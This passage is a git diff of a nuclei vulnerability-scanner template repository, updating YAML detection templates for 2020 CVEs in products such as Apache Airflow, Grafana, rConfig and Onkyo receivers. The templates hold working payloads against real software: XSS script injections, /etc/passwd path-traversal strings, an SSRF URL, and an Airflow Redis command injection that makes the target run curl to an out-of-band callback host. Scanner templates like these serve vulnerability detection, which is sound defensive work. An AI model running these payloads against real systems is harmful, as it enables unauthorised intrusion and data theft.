https://www.redtimmy.com/web-application-hacking/another-ssrf-another-rce-the-microstrategy-case/ - https://nvd.nist.gov/vuln/detail/cve-2020-11450 - remediation: Mitigated in all versions 11.0 and higher. + - http://seclists.org/fulldisclosure/2020/Apr/1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-11450 - tags: microstrategy,exposure,jvm,config,packetstorm,cve,cve2020 + epss-score: 0.59818 + epss-percentile: 0.9769 + cpe: cpe:2.3:a:microstrategy:microstrategy_web:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microstrategy + product: microstrategy_web + tags: cve2020,cve,packetstorm,seclists,microstrategy,exposure,jvm,config,xss -requests: +http: - method: GET path: - '{{BaseURL}}/MicroStrategyWS/happyaxis.jsp' redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -38,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/01 +# digest: 490a0046304402207f02ce103c843033fcd0dd39bee5dad70ceb9e191712097646564dc114484d7902202c6318b8db1435ad9b63f45973a1f98d6968ebfdd30a61f06e77574baba5584e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-11455.yaml b/nuclei-templates/CVE-2020/CVE-2020-11455.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-11455.yaml rename to nuclei-templates/CVE-2020/CVE-2020-11455.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-11546.yaml b/nuclei-templates/CVE-2020/CVE-2020-11546.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-11546.yaml rename to nuclei-templates/CVE-2020/CVE-2020-11546.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-11798.yaml b/nuclei-templates/CVE-2020/CVE-2020-11798.yaml index 791cbadcbb..7495b1df8e 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-11798.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-11798.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories. + impact: | + An attacker can exploit this vulnerability to view, modify, or delete arbitrary files on the system, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest security patches or updates provided by Mitel to mitigate the vulnerability and prevent unauthorized access. reference: @@ -19,8 +21,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-11798 cwe-id: CWE-22 - epss-score: 0.8339 - epss-percentile: 0.98128 + epss-score: 0.82302 + epss-percentile: 0.98125 cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: mitel product: micollab_audio\,_web_\&_video_conferencing shodan-query: html:"Mitel" html:"MiCollab" - tags: packetstorm,cve,cve2020,mitel,micollab,lfi + tags: cve,cve2020,packetstorm,mitel,micollab,lfi http: - method: GET @@ -52,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022051b896ec6490bc9b70906f0e802bddb6026484f3c8afae0e3fed56efda44a19102210095aeb173746c6199f5e26528708637700bf7eb450e8a1c5a9a6604b0ab6a33c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ee09db1547c9925f293f0463f88b484cddfa389398144842302ca857f22c49b9022100e448a84faecb3de55840bac9ed9d2ef82a2148cb20c7ab2009853c094bc8b232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-11854.yaml b/nuclei-templates/CVE-2020/CVE-2020-11854.yaml new file mode 100644 index 0000000000..710aa30a11 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-11854.yaml @@ -0,0 +1,37 @@ +id: CVE-2020-11854 + +info: + name: Micro Focus UCMDB RCE + author: dwisiswant0 + severity: critical + reference: http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html + description: | + This template supports the detection part only. + + UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected, + but this template can probably also be used to detect Operations Bridge Manager + (containeirized) and Application Performance Management. + + Originated from Metasploit module (#14654). + tags: cve,cve2020,ucmdb,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-11854 + cwe-id: CWE-798 + +requests: + - method: GET + path: + - "{{BaseURL}}/ucmdb-api/connect" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "HttpUcmdbServiceProviderFactoryImpl" + - "ServerVersion=11.6.0" + part: body + condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-11930.yaml b/nuclei-templates/CVE-2020/CVE-2020-11930.yaml deleted file mode 100644 index 3d90c29e03..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-11930.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2020-11930 -info: - name: WordPress Plugin "Translate WordPress with GTranslate" (gtranslate) XSS - author: dhiyaneshDK - severity: medium - description: | - The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option. - reference: - - https://wpscan.com/vulnerability/10181 - - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module - - https://plugins.trac.wordpress.org/changeset/2245581/gtranslate - - https://plugins.trac.wordpress.org/changeset/2245591/gtranslate - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-11930 - cwe-id: CWE-79 - tags: cve,cve2020,wordpress,xss,plugin -requests: - - method: GET - path: - - '{{BaseURL}}/does_not_exist"%22%3E%3Cscript%3Ealert("XSS")%3C/script%3Ealert("XSS")' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-11981.yaml b/nuclei-templates/CVE-2020/CVE-2020-11981.yaml index d5951f7dc7..a71f9ce3bb 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-11981.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-11981.yaml @@ -6,35 +6,56 @@ info: severity: critical description: | An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. + remediation: Upgrade apache-airflow to version 1.10.11 or higher. reference: - https://github.com/apache/airflow/pull/9178 - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981 - remediation: Upgrade apache-airflow to version 1.10.11 or higher. + - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E + - https://github.com/t0m4too/t0m4to + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-11981 cwe-id: CWE-78 - epss-score: 0.936930000 + epss-score: 0.9386 + epss-percentile: 0.99081 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: apache + product: airflow shodan-query: product:"redis" - verified: true tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive - variables: - data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"" + data: "*3\r + + $5\r + + LPUSH\r + + $7\r + + default\r + + $936\r + + {\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"" encode1: '[[["curl", "http://' encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]' end: '"}' - tcp: - inputs: - - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r\n')}}" + - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r + + ')}}" read: 1024 host: - "{{Hostname}}" - port: 6379 + - "{{Host}}:6379" matchers-condition: and matchers: @@ -47,3 +68,4 @@ tcp: part: interactsh_request words: - "User-Agent: curl" +# digest: 4a0a0047304502203c3d6f6dd85e588f87e0a6431df2c54e99a8ba26b833fbc6d60adfc2e84e5592022100ea5606a791f03c7c31c914589e437fa299e4a75d4f4f187cae1e0e0247a52fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-11991.yaml b/nuclei-templates/CVE-2020/CVE-2020-11991.yaml deleted file mode 100644 index 62b14672c5..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-11991.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2020-11991 - -info: - name: Apache Cocoon 2.1.12 XML Injection - author: pikpikcu - severity: high - description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system. - remediation: Upgrade to Apache Cocoon 2.1.13 or later. - reference: - - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b - - https://nvd.nist.gov/vuln/detail/CVE-2020-11991 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2020-11991 - cwe-id: CWE-611 - tags: cve,cve2020,apache,xml,cocoon,xxe - -requests: - - method: POST - path: - - "{{BaseURL}}/v2/api/product/manger/getInfo" - headers: - Content-Type: "text/xml" - body: | - - ]> - - John - &ent; - - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/05 diff --git a/nuclei-templates/CVE-2020/CVE-2020-12127.yaml b/nuclei-templates/CVE-2020/CVE-2020-12127.yaml index 09398bfcdf..f49348ba37 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-12127.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-12127.yaml @@ -6,21 +6,33 @@ info: severity: high description: | WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://cerne.xyz/bugs/CVE-2020-12127 - https://www.wavlink.com/en_us/product/WL-WN530H4.html - https://nvd.nist.gov/vuln/detail/CVE-2020-12127 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12127 cwe-id: CWE-306 + epss-score: 0.06293 + epss-percentile: 0.93458 + cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn530h4_firmware shodan-query: http.html:"Wavlink" - verified: "true" tags: cve,cve2020,wavlink,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh" @@ -39,5 +51,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/01 +# digest: 4b0a00483046022100dffbff0cc3444989ae4c3286f2188aabc64aed833325784119cb5011f1a954ba022100a340bd327ffe1705d7ab2e5a234fb95df02461a432dbbafbcf937d1d7da6f52a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-12256.yaml b/nuclei-templates/CVE-2020/CVE-2020-12256.yaml index 9801f542d0..bf22dc4ca5 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-12256.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-12256.yaml @@ -1,24 +1,54 @@ -id: cve-2020-12256 +id: CVE-2020-12256 + info: - name: rConfig 3.9.4 XSS - author: pikpikcu + name: rConfig 3.9.4 - Cross-Site Scripting + author: r3Y3r53 severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12256 - tags: cve,cve2020,rconfig,xss -requests: - - method: GET - path: - - '{{BaseURL}}/devicemgmt.php?deviceId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E' - matchers-condition: and + description: | + The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 + - https://nvd.nist.gov/vuln/detail/CVE-2020-12256 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-12256 + cwe-id: CWE-79 + epss-score: 0.17512 + epss-percentile: 0.95674 + cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* + metadata: + verified: "true" + max-request: 3 + vendor: rconfig + product: rconfig + shodan-query: http.title:"rConfig" + tags: cve,cve2020,rconfig,authenticated,xss + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + - | + GET /devicemgmt.php?deviceId="> HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true matchers: - - type: word - words: - - "" - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - "text/html" + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' + - 'contains(content_type_3, "text/html")' + condition: and +# digest: 490a0046304402203df7f7a1fafc6740fbc98163bb2959e9bd581ba8ddfd68573ca0af9a64f081ab02202b23a11ef0e6910123ef3657ed3d2374c3748e4f25a59b1d9d7f2e20b40dd381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-12259.yaml b/nuclei-templates/CVE-2020/CVE-2020-12259.yaml deleted file mode 100644 index 27ad2d9441..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-12259.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: cve-2020-12259 - -info: - name: rConfig 3.9.4 XSS - author: pikpikcu - severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12259 - tags: cve,cve2020,rconfig,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/configDevice.php?rid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2020/CVE-2020-12447.yaml b/nuclei-templates/CVE-2020/CVE-2020-12447.yaml new file mode 100644 index 0000000000..941f7e0b40 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-12447.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-12447 + +info: + name: Onkyo TX-NR585 Web Interface - Directory Traversal + author: 0x_Akoko + severity: high + description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion. + impact: | + An attacker can access sensitive files on the system, potentially leading to unauthorized access, information disclosure, or further exploitation. + remediation: | + Apply the latest firmware update provided by the vendor to fix the directory traversal vulnerability. + reference: + - https://blog.spookysec.net/onkyo-lfi + - https://nvd.nist.gov/vuln/detail/CVE-2020-12447 + - https://blog.spookysec.net/onkyo-lfi/ + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-12447 + cwe-id: CWE-22 + epss-score: 0.01711 + epss-percentile: 0.8752 + cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: onkyo + product: tx-nr585_firmware + tags: cve,cve2020,onkyo,lfi,traversal + +http: + - method: GET + path: + - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100927c1a44689d7680e0dee3d0c8c5daf8e08fd834eb2fbb5cfea86f3a531c00b9022100c9621cde469f6eace4647eeeb2c70aeea221843a6410e3c169dd9a1f9d162936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-12478.yaml b/nuclei-templates/CVE-2020/CVE-2020-12478.yaml index ed7969f61c..da5cb58c9e 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-12478.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-12478.yaml @@ -6,20 +6,33 @@ info: severity: high description: | TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can bypass authentication and gain unauthorized access to sensitive information. + remediation: | + Upgrade to a patched version of TeamPass or apply the recommended security patches. reference: - https://github.com/nilsteampassnet/TeamPass/issues/2764 - https://nvd.nist.gov/vuln/detail/CVE-2020-12478 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12478 cwe-id: CWE-306 + epss-score: 0.01186 + epss-percentile: 0.8478 + cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: teampass + product: teampass shodan-query: http.html:"teampass" - verified: "true" - tags: cve,cve2020,teampass,exposure,unauth + tags: cve2020,cve,teampass,exposure,unauth -requests: +http: - method: GET path: - "{{BaseURL}}/files/ldap.debug.txt" @@ -39,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/01 +# digest: 4a0a00473045022100d6f70c837b7c35ddacae603e0c1e3daa72b7f9d47c89a8c75302c0c8ed6e58d9022013c29b988bbbd1e577d673ae7d7e7f5afcb4c3660336ac45125a6db251230793:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-12720.yaml b/nuclei-templates/CVE-2020/CVE-2020-12720.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-12720.yaml rename to nuclei-templates/CVE-2020/CVE-2020-12720.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-12800.yaml b/nuclei-templates/CVE-2020/CVE-2020-12800.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-12800.yaml rename to nuclei-templates/CVE-2020/CVE-2020-12800.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-13121.yaml b/nuclei-templates/CVE-2020/CVE-2020-13121.yaml index 85e6f703ba..38db107834 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13121.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13121.yaml @@ -1,5 +1,4 @@ id: CVE-2020-13121 - info: name: Submitty 20.04.01 - Open redirect author: 0x_Akoko @@ -8,27 +7,18 @@ info: reference: - https://github.com/Submitty/Submitty/issues/5265 - https://www.cvedetails.com/cve/CVE-2020-13121 + tags: cve,cve2020,redirect,submitty classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2020-13121 cwe-id: CWE-601 - tags: cve,cve2020,redirect,submitty,oos - requests: - - raw: - - | - POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/authentication/login - - user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login - - cookie-reuse: true + - method: GET + path: + - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com' matchers: - type: regex - part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-13258.yaml b/nuclei-templates/CVE-2020/CVE-2020-13258.yaml index 5034d00f30..9c8e3873f9 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13258.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13258.yaml @@ -6,17 +6,30 @@ info: severity: medium description: | Contentful through 2020-05-21 for Python contains a reflected cross-site scripting vulnerability via the api parameter to the-example-app.py. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade Contentful to a version that is not vulnerable to CVE-2020-13258 or apply the necessary patches provided by the vendor. reference: - https://github.com/contentful/the-example-app.py/issues/44 - https://nvd.nist.gov/vuln/detail/CVE-2020-13258 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-13258 cwe-id: CWE-79 + epss-score: 0.00464 + epss-percentile: 0.7492 + cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: contentful + product: python_example tags: cve,cve2020,contentful,xss -requests: +http: - raw: - | GET /?cda'"&locale=locale=de-DE HTTP/1.1 HTTP/1.1 @@ -38,5 +51,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 490a00463044022027c5f2643bd4cd615440112890d0d23c6b5ac5613534bf20e9b6c3f6e67fdac90220773833d83834dbacee963a6c0ea63557e73c73e473d68647ce026eb13c287f16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-13379.yaml b/nuclei-templates/CVE-2020/CVE-2020-13379.yaml index 72ae627c75..b3e76eb97f 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13379.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13379.yaml @@ -1,32 +1,59 @@ id: CVE-2020-13379 + info: - name: Grafana DoS Probing - author: medbsq + name: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery + author: Joshua Rogers severity: high - #https://www.cvebase.com/cve/2020/13379 -requests: + description: | + Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. + remediation: Upgrade to 6.3.4 or higher. + reference: + - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9 + - https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192 + - http://www.openwall.com/lists/oss-security/2020/06/03/4 + - https://nvd.nist.gov/vuln/detail/CVE-2020-13379 + - http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H + cvss-score: 8.2 + cve-id: CVE-2020-13379 + cwe-id: CWE-918 + epss-score: 0.76934 + epss-percentile: 0.97935 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: grafana + product: grafana + shodan-query: title:"Grafana" + tags: cve2020,cve,grafana,ssrf + +http: - method: GET path: - - "{{BaseURL}}/avatar/120" - - "{{BaseURL}}/grafana/avatar/120" - - "{{BaseURL}}/debug/grafana/avatar/120" - - "{{BaseURL}}/-/grafana/avatar/120" - - "{{BaseURL}}/gitlab/-/grafana/avatar/120" - - "{{BaseURL}}/-/debug/grafana/avatar/120" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" + - "{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" + + stop-at-first-match: true + matchers-condition: and matchers: - type: word + part: body words: - - "IEND" - - "PNG" + - "cloudflare.com" + - "dns" condition: and - part: body + - type: word - words: - - "Content-Type: image/jpeg" part: header + words: + - "image/jpeg" + - type: status status: - 200 +# digest: 4a0a0047304502205b9bd2aa77748627d7df56b1f9ddb380e47285274318cb1a472d118ac7ea5dab022100e2b67b3e80048d92b7de1e74b9a632e18562312f42d046e47dde1538b01001e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-13405.yaml b/nuclei-templates/CVE-2020/CVE-2020-13405.yaml deleted file mode 100644 index 12407d9ae9..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-13405.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2020-13405 - -info: - name: MicroWeber - Unauthenticated User Database Disclosure - author: ritikchaddha,amit-jd - severity: high - description: | - The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML. - reference: - - https://rhinosecuritylabs.com/research/microweber-database-disclosure/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-13405 - - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-13405 - cwe-id: CWE-306 - metadata: - shodan-query: http.html:"microweber" - verified: "true" - tags: cve,cve2020,microweber,unauth,disclosure - -requests: - - raw: - - | - POST /module/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}admin/view:modules/load_module:users - - module={{endpoint}} - - payloads: - endpoint: - - "users/controller" - - "modules/users/controller" - - "/modules/users/controller" - - matchers: - - type: dsl - dsl: - - 'contains(body,"username")' - - 'contains(body,"password")' - - 'contains(body,"password_reset_hash")' - - 'status_code==200' - - 'contains(all_headers,"text/html")' - condition: and diff --git 